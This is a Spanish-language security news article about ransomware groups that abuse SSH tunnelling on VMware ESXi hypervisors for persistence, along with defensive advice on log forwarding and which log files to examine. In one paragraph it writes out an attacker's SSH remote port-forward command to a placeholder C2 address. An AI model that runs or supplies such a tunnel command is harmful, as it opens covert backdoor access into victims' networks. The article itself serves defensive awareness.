Los actores de ransomware se dirigen cada vez más a los hipervisores sin sistema operativo de VMware ESXi, explotando el túnel SSH para mantener un acceso persistente y no detectado a los sistemas comprometidos.
Según la firma de ciberseguridad Sygnia, los actores de amenazas están aprovechando las vulnerabilidades conocidas en los dispositivos ESXi o explotando las credenciales de administrador comprometidas para obtener acceso inicial. Una vez dentro, explotan el servicio SSH integrado del hipervisor, diseñado para permitir a los administradores del sistema gestionar el dispositivo de forma remota. Este servicio, sin embargo, rara vez es monitoreado por muchas organizaciones, lo que lo convierte en un vector atractivo para los atacantes.
Los actores de ransomware están abusando de la función para establecer persistencia, moverse lateralmente dentro de la red y desplegar cargas útiles de ransomware.
Mediante el uso de túneles SSH, los atacantes pueden enrutar de forma segura el tráfico entre el hipervisor comprometido y los servidores externos de comando y control (C2).
Por ejemplo, los atacantes pueden establecer una configuración de reenvío de puertos remotos a través de SSH para establecer una conexión de vuelta al servidor C2, utilizando un comando como ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>. Esto permite a los atacantes hacer un túnel a través del hipervisor y permanecer sin ser detectados durante períodos prolongados.
"Dado que los dispositivos ESXi son resistentes y rara vez se apagan inesperadamente, este túnel sirve como una puerta trasera semipersistente dentro de la red", señalaron los investigadores.
Los dispositivos ESXi utilizan un mecanismo de registro distribuido que separa las entradas de registro en varios archivos dedicados, en lugar de consolidarlas en uno, como se ve con los formatos de syslog tradicionales. Este enfoque, aunque organizado, puede complicar las investigaciones forenses, ya que los registros se distribuyen en varios archivos.
Para solucionar este problema, se recomienda configurar el reenvío de registros de ESXi a un servidor syslog externo para la supervisión centralizada y la retención de registros. Esta configuración garantiza que todos los eventos relevantes se capturen en una sola ubicación. Los archivos de registro de claves para investigar posibles ataques, como la tunelización SSH, incluyen /var/log/shell.log, /var/log/hostd.log, /var/log/auth.log y /var/log/vobd.log.
Fuente: Actores de ransomware que se dirigen a hipervisores ESXi con túnel SSH para persistir
